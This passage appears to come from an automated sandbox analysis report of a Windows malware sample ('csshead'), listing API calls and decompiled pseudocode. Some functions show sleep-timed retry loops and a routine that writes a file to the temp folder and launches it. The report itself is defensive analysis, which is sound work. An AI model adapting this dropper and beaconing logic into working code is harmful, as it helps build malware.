      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • __isleadbyte_l.LIBCMT ref: 0042B7B9
    • _strlen.LIBCMT ref: 0042B8D3
    • RtlDecodePointer.NTDLL(?), ref: 0042BA5D
    • RtlDecodePointer.NTDLL(?), ref: 0042BA89
    • RtlDecodePointer.NTDLL(?), ref: 0042BAAB
    • __aulldvrm.INT64 ref: 0042BC12
    • _write_string.LIBCMT ref: 0042BD55
    • _write_string.LIBCMT ref: 0042BE26
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 0042FF3F: __isleadbyte_l.LIBCMT ref: 0042FFA6
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,?,00000000,00000000,?,?,?,?,00422655), ref: 0042FFD7
      • Part of subcall function 0042FF3F: MultiByteToWideChar.KERNEL32(00000080,00000009,00422655,00000001,00000000,00000000,?,?,?,?,00422655), ref: 00430045
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0040660C, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 214sleep
    C-Code - Quality: 95%
    			E0040660C(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _v48;
				intOrPtr _v52;
				char _v181;
				char _v264;
				char _v329;
				char _v394;
				intOrPtr _t116;
				intOrPtr _t123;
				signed int _t131;
				signed int _t151;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t175;
				intOrPtr _t195;
				void* _t201;
				void* _t202;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				E004064BC( &_v264, 0x51, __eflags);
				_v36 = E00401110(_v12, E00406900);
				_v40 = _v36 - _v12;
				E004012B8( &_v329, _v40, _v12);
				 *((char*)(_t201 + _v40 - 0x145)) = 0;
				E00401308( &_v394,  &_v329);
				_v44 = 1;
				L1:
				while(1) {
					if(_v44 % 0x32 == 0 || _v44 == 1) {
						L3:
						_t184 = _a8;
						_t116 =  *0x40a194; // 0x401e9c
						_v24 = E00405AE8(_t116, _a8, 0);
						if(_v24 == 0) {
							Sleep(0x927c0);
							goto L3;
						}
						_t123 =  *0x40c230; // 0x0
						_v24 = E00405D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32);
						if(_v24 == 0) {
							goto L7;
						} else {
							E00401440(_v28);
							_v20 = 0;
							goto L39;
						}
					} else {
						L7:
						_v48 = GetTickCount();
						_t195 =  *0x40c230; // 0x0
						E00406340( &_v329, 0x94, _t195, __eflags);
						_v24 = 0;
						_t131 = E00401110(_a4,  &_v329);
						__eflags = _t131;
						if(_t131 == 0) {
							E00401308( &_v181,  &_v329);
							E0040133C( &_v181, _v36);
							_t202 = _t202 + 8;
							_t175 =  *0x40c230; // 0x0
							_v24 = E00405D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32);
						}
						__eflags = _v24;
						if(_v24 == 0) {
							_v48 = GetTickCount() - _v48;
							__eflags = _v48 - 0x1388;
							if(_v48 < 0x1388) {
								__eflags = 0x1388;
								Sleep(0x1388 - _v48);
							}
							_v52 = E00405468();
							__eflags = _v44 - 5;
							if(_v44 != 5) {
								L19:
								__eflags = _v52 - _v16 - 0x3f480;
								if(_v52 - _v16 >= 0x3f480) {
									__eflags = _v52 - _v16 - 0x3f480;
									if(_v52 - _v16 <= 0x3f480) {
										L28:
										__eflags = _v52 - _v16 - 0x7e900;
										if(_v52 - _v16 <= 0x7e900) {
											L33:
											__eflags = _v52 - _v16 - 0xd2f00;
											if(_v52 - _v16 > 0xd2f00) {
												__eflags = _v44 - 0x12c;
												if(_v44 != 0x12c) {
													_t95 =  &_v44;
													 *_t95 = _v44 + 1;
													__eflags =  *_t95;
												} else {
													_v44 = 1;
												}
											}
											L37:
											__eflags = _v44 - 1;
											if(__eflags == 0) {
												E00401308( &_v329,  &_v394);
											}
											continue;
										}
										__eflags = _v52 - _v16 - 0xd2f00;
										if(_v52 - _v16 >= 0xd2f00) {
											goto L33;
										}
										__eflags = _v44 - 0xc8;
										if(_v44 != 0xc8) {
											_v44 = _v44 + 1;
										} else {
											_v44 = 1;
										}
										goto L37;
									}
									__eflags = _v52 - _v16 - 0x7e900;
									if(_v52 - _v16 >= 0x7e900) {
										goto L28;
									}
									__eflags = _v44 - 0x64;
									if(_v44 != 0x64) {
										_v44 = _v44 + 1;
									} else {
										_v44 = 1;
									}
									goto L37;
								}
								__eflags = _v44 - 0x32;
								if(_v44 != 0x32) {
									_v44 = _v44 + 1;
								} else {
									_v44 = 1;
								}
								goto L37;
							} else {
								__eflags = _v52 - _a16 - 0x927c0;
								if(_v52 - _a16 >= 0x927c0) {
									goto L19;
								}
								Sleep(0x493e0);
								_t151 = E00405620();
								asm("sbb eax, eax");
								__eflags =  ~( ~_t151);
								if( ~( ~_t151) == 0) {
									while(1) {
										_t154 =  *0x40a194; // 0x401e9c
										_t155 = E00405AE8(_t154, _a8, 0);
										asm("sbb eax, eax");
										__eflags =  ~( ~_t155);
										if( ~( ~_t155) != 0) {
											goto L19;
										}
										Sleep(0x927c0);
									}
								}
								goto L19;
							}
						} else {
							E00401308(_a12,  &_v181);
							E00401440(_v28);
							_v20 = 0xffffffff;
							L39:
							return _v20;
						}
					}
				}
			}





























    0x00406615
    0x00406618
    0x0040661b
    0x00406620
    0x0040662b
    0x0040663d
    0x00406646
    0x00406655
    0x0040665d
    0x00406671
    0x00406676
    0x00000000
    0x0040667d
    0x0040668b
    0x00406693
    0x00406693
    0x00406698
    0x004066a2
    0x004066a9
    0x004066f5
    0x00000000
    0x004066f5
    0x004066c6
    0x004066d5
    0x004066dc
    0x00000000
    0x004066de
    0x004066e1
    0x004066e8
    0x00000000
    0x004066e8
    0x004066fd
    0x004066fd
    0x00406703
    0x00406711
    0x00406717
    0x0040671e
    0x0040672a
    0x0040672f
    0x00406731
    0x0040673f
    0x0040674f
    0x00406754
    0x00406775
    0x00406784
    0x00406784
    0x00406787
    0x0040678b
    0x004067b8
    0x004067bb
    0x004067c2
    0x004067c9
    0x004067cd
    0x004067cd
    0x004067d8
    0x004067db
    0x004067df
    0x0040682e
    0x00406834
    0x00406839
    0x0040685b
    0x00406860
    0x00406883
    0x00406889
    0x0040688e
    0x004068b4
    0x004068ba
    0x004068bf
    0x004068c1
    0x004068c8
    0x004068d3
    0x004068d3
    0x004068d3
    0x004068ca
    0x004068ca
    0x004068ca
    0x004068c8
    0x004068d6
    0x004068d6
    0x004068da
    0x004068ec
    0x004068ec
    0x00000000
    0x004068da
    0x00406896
    0x0040689b
    0x00000000
    0x00000000
    0x0040689d
    0x004068a4
    0x004068af
    0x004068a6
    0x004068a6
    0x004068a6
    0x00000000
    0x004068a4
    0x00406868
    0x0040686d
    0x00000000
    0x00000000
    0x0040686f
    0x00406873
    0x0040687e
    0x00406875
    0x00406875
    0x00406875
    0x00000000
    0x00406873
    0x0040683b
    0x0040683f
    0x0040684d
    0x00406841
    0x00406841
    0x00406841
    0x00000000
    0x004067e1
    0x004067e7
    0x004067ec
    0x00000000
    0x00000000
    0x004067f3
    0x004067f9
    0x00406800
    0x00406804
    0x00406806
    0x00406815
    0x0040681a
    0x0040681f
    0x00406826
    0x0040682a
    0x0040682c
    0x00000000
    0x00000000
    0x0040680f
    0x0040680f
    0x00406815
    0x00000000
    0x00406806
    0x0040678d
    0x00406796
    0x0040679e
    0x004067a3
    0x004068f6
    0x004068fc
    0x004068fc
    0x0040678b
    0x0040668b

    APIs
      • Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530
    • Sleep.KERNEL32(000927C0), ref: 004066F5
    • GetTickCount.KERNEL32 ref: 004066FD
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • GetTickCount.KERNEL32 ref: 004067AF
    • Sleep.KERNEL32(00001388), ref: 004067CD
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
    • Sleep.KERNEL32(000493E0), ref: 004067F3
    • Sleep.KERNEL32(000927C0), ref: 0040680F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00414710, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121window
    APIs
    • SelectObject.GDI32(00000000,00000000), ref: 004147C8
    • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
    • GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412B8A
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412C1F
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412C22
      • Part of subcall function 00412B40: SelectObject.GDI32(00000000,00000000), ref: 00412C38
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412C53
      • Part of subcall function 00412B40: SelectObject.GDI32(00000000,?), ref: 00412CAE
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412CC4
      • Part of subcall function 00412B40: SetBkColor.GDI32(00000000,00808080), ref: 00412CF7
      • Part of subcall function 00412B40: SelectObject.GDI32(00000000,00000000), ref: 00412D5A
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412D69
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D77
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D89
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412D9B
      • Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412DA6
      • Part of subcall function 00412B40: FillRect.USER32(?,?,?), ref: 00412DE0
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412DF1
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412E2D
      • Part of subcall function 00412B40: SelectObject.GDI32(?,?), ref: 00412E5D
      • Part of subcall function 00412B40: SelectObject.GDI32(?,00000000), ref: 00412E69
      • Part of subcall function 00412B40: SelectObject.GDI32(?,00000000), ref: 00412E75
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E82
      • Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412E8D
      • Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E94
    • SelectObject.GDI32(00000000,?), ref: 0041485A
    • DeleteObject.GDI32(00000000), ref: 00414865
    • DeleteDC.GDI32(00000000), ref: 00414872
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004082F8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106processsleep
    C-Code - Quality: 100%
    			E004082F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr _t41;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t77;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = E00407CFC(_v12);
				E00401258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t41 =  *0x40a168; // 0x401dec
					E00407290(_t41);
				} else {
					_v28 = E00401110(_v8, 0x408494);
					_t96 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E00407560( &_v1054, 0x408494, _t96);
						E00401308( &_v541, 0x40849c);
						E0040133C( &_v541,  &_v1054);
						E0040133C( &_v541, 0x40849c);
						_t57 =  *0x40a0a8; // 0x401c4c
						E0040133C( &_v541, _t57);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x40b514 = 0;
							_t62 =  *0x40b510; // 0x0
							E00401828(_t62);
							E004013B4(0x40b510, _v16);
							_t66 =  *0x40b510; // 0x0
							E004012B8(_t66, _v16, _v12);
							 *0x40b514 = _v16;
							 *0x40be1c = 0;
							wsprintfA("1530474054", 0x4084a0, _v24);
						} else {
							E0040485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t77 =  *0x40a174; // 0x401e10
								E00407290(_t77);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}


















    0x00408301
    0x00408304
    0x00408307
    0x0040830c
    0x00408317
    0x00408325
    0x0040832a
    0x00408338
    0x00408481
    0x00408486
    0x0040833e
    0x0040834b
    0x0040834e
    0x00408352
    0x00408364
    0x00408370
    0x00408380
    0x00408393
    0x004083a7
    0x004083af
    0x004083bc
    0x004083cb
    0x0040842d
    0x00408432
    0x00408437
    0x00408444
    0x0040844f
    0x00408454
    0x0040845c
    0x00408461
    0x00408476
    0x004083cd
    0x004083d9
    0x004083e3
    0x00408414
    0x0040841f
    0x00408424
    0x00408416
    0x00408416
    0x00408416
    0x00408414
    0x004083cb
    0x00408352
    0x00408491

    APIs
    • GetTempPathA.KERNEL32(00000201,?), ref: 00408364
    • Sleep.KERNEL32(000005DC), ref: 004083E3
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • wsprintfA.USER32 ref: 00408476
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
      • Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
      • Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004244DA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98LIBRARYCODE
    APIs
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    • RtlDecodePointer.NTDLL(0043CD38), ref: 00424524
    • RtlDecodePointer.NTDLL ref: 00424535
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • RtlDecodePointer.NTDLL(-00000004), ref: 0042455B
    • RtlDecodePointer.NTDLL ref: 0042456E
    • RtlDecodePointer.NTDLL ref: 00424578
      • Part of subcall function 0042BFB2: RtlLeaveCriticalSection.NTDLL ref: 0042BFC1
      • Part of subcall function 004243C2: ExitProcess.KERNEL32 ref: 004243D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00408AA4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59windowthreadregistry
    C-Code - Quality: 91%
    			E00408AA4(void* __edx, void* __eflags) {
				struct _WNDCLASSEXA _v52;
				struct tagMSG _v80;
				char _v97;
				void* _t14;

				E00401164(E004010B4(E00401164(E004010B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
				E00401258( &_v52, 0x30);
				_v52.cbSize = 0x30;
				_v52.hInstance = 0;
				_v52.lpszClassName =  &_v97;
				_v52.lpfnWndProc = E00408A48;
				RegisterClassExA( &_v52);
				 *0x40a574 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0);
				if( *0x40a574 != 0) {
					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
						TranslateMessage( &_v80);
						DispatchMessageA( &_v80);
					}
				}
				_push(0);
				return RtlExitUserThread();
			}







    0x00408ac2
    0x00408acf
    0x00408ad4
    0x00408add
    0x00408ae3
    0x00408ae6
    0x00408af1
    0x00408b23
    0x00408b2f
    0x00408b47
    0x00408b37
    0x00408b41
    0x00408b41
    0x00408b47
    0x00408b5b
    0x00408b66

    APIs
    • RegisterClassExA.USER32(00000030), ref: 00408AF1
    • CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00408B1D
    • TranslateMessage.USER32(?), ref: 00408B37
    • DispatchMessageA.USER32(?), ref: 00408B41
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00408B51
    • RtlExitUserThread.NTDLL(00000000), ref: 00408B5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00410C00, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56library
    APIs
    • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00410C2D
    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00410C46
    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00410C58
    • FreeLibrary.KERNEL32(00000000), ref: 00410C67
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00414E70, Relevance: 12.1, APIs: 8, Instructions: 129thread
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00414E8C
    • DeleteObject.GDI32(?), ref: 00414EE6
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 00414F07
    • GetCurrentThreadId.KERNEL32 ref: 00414F1A
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00414F51
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414F6A
    • UnhookWindowsHookEx.USER32(00000000), ref: 00414F93
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041500D
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004121B0, Relevance: 12.1, APIs: 8, Instructions: 128window
    APIs
    • IsWindowEnabled.USER32(?), ref: 004121F0
    • GetFocus.USER32 ref: 004121FE
    • MessageBeep.USER32(00000000), ref: 00412304
      • Part of subcall function 00411010: SendMessageA.USER32(?,0000044E,?,?), ref: 00411023
    • MessageBeep.USER32(00000000), ref: 00412232
    • GetClientRect.USER32(?,?), ref: 0041225F
    • SendMessageA.USER32(?,0000041D,?,?), ref: 00412290
    • SendMessageA.USER32(?,00000417,?,?), ref: 004122BB
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004122E0
      • Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411DD0, Relevance: 12.1, APIs: 8, Instructions: 117window
    APIs
    • GetCapture.USER32 ref: 00411DE7
    • ClientToScreen.USER32(?,?), ref: 00411E1D
    • GetWindowRect.USER32(?,?), ref: 00411E42
    • ReleaseCapture.USER32 ref: 00411E5E
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?,?,?), ref: 00411EBD
    • SendMessageA.USER32(?,00000112,0000F020,000000FD), ref: 00411EE4
    • SendMessageA.USER32(?,00000112,0000F120,00000000), ref: 00411F07
    • SendMessageA.USER32(?,00000112,0000F060,00000000), ref: 00411F2A
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00412380, Relevance: 12.1, APIs: 8, Instructions: 107window
    APIs
    • GetMessagePos.USER32 ref: 00412389
    • WindowFromPoint.USER32(?,00000000), ref: 004123BB
    • ScreenToClient.USER32(?,?), ref: 004123CF
    • SendMessageA.USER32(?,00000445,00000000,?), ref: 004123E5
    • GetMenuItemCount.USER32(?), ref: 00412415
      • Part of subcall function 00410FD0: SendMessageA.USER32(?,00000417,?,?), ref: 00410FE2
    • PostMessageA.USER32(?,00000202,00000000,?), ref: 0041249F
    • PostMessageA.USER32(?,00000100,0000001B,00000000), ref: 004124AB
    • ScreenToClient.USER32(?,?), ref: 004124BF
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00423C51, Relevance: 12.1, APIs: 8, Instructions: 97thread
    APIs
      • Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
      • Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
      • Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A
    • ___fls_getvalue@4.LIBCMT ref: 00423C62
      • Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E
    • ___fls_setvalue@8.LIBCMT ref: 00423C75
      • Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
    • RtlExitUserThread.NTDLL(00000000), ref: 00423C85
    • GetCurrentThreadId.KERNEL32 ref: 00423C8B
      • Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3
      • Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
      • Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • __getptd.LIBCMT ref: 00423CF4
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041F3B0, Relevance: 12.1, APIs: 8, Instructions: 75thread
    APIs
    • GetCurrentProcess.KERNEL32 ref: 0041F3EA
    • FlushInstructionCache.KERNEL32(00000000), ref: 0041F3F1
    • GetCurrentThreadId.KERNEL32 ref: 0041F405
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041F413
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041F42D
    • DialogBoxParamA.USER32(00442B94,00000064,?,00408EC0,?), ref: 0041F44B
    • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 0041F470
      • Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
      • Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL(00442B5C), ref: 00421ECC
      • Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
      • Part of subcall function 00421F2E: RtlInterlockedPopEntrySList.NTDLL ref: 00421EF5
      • Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
      • Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C
    • SetLastError.KERNEL32(0000000E,00000000,0041F69F,00000000), ref: 0041F458
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00425A54, Relevance: 12.1, APIs: 8, Instructions: 61LIBRARYCODE
    APIs
    • InterlockedDecrement.KERNEL32(0042DE52), ref: 00425A6E
    • InterlockedDecrement.KERNEL32(1424541B), ref: 00425A7B
    • InterlockedDecrement.KERNEL32(541B0824), ref: 00425A88
    • InterlockedDecrement.KERNEL32(442BDB33), ref: 00425A95
    • InterlockedDecrement.KERNEL32(DA83D8F7), ref: 00425AA2
    • InterlockedDecrement.KERNEL32(DA83D8F7), ref: 00425ABE
    • InterlockedDecrement.KERNEL32(24448BD8), ref: 00425ACE
    • InterlockedDecrement.KERNEL32(44395371), ref: 00425AE4
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004259C5, Relevance: 12.1, APIs: 8, Instructions: 58LIBRARYCODE
    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 004259D7
    • InterlockedIncrement.KERNEL32(?), ref: 004259E4
    • InterlockedIncrement.KERNEL32(?), ref: 004259F1
    • InterlockedIncrement.KERNEL32(?), ref: 004259FE
    • InterlockedIncrement.KERNEL32(?), ref: 00425A0B
    • InterlockedIncrement.KERNEL32(?), ref: 00425A27
    • InterlockedIncrement.KERNEL32(00000000), ref: 00425A37
    • InterlockedIncrement.KERNEL32(?), ref: 00425A4D
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
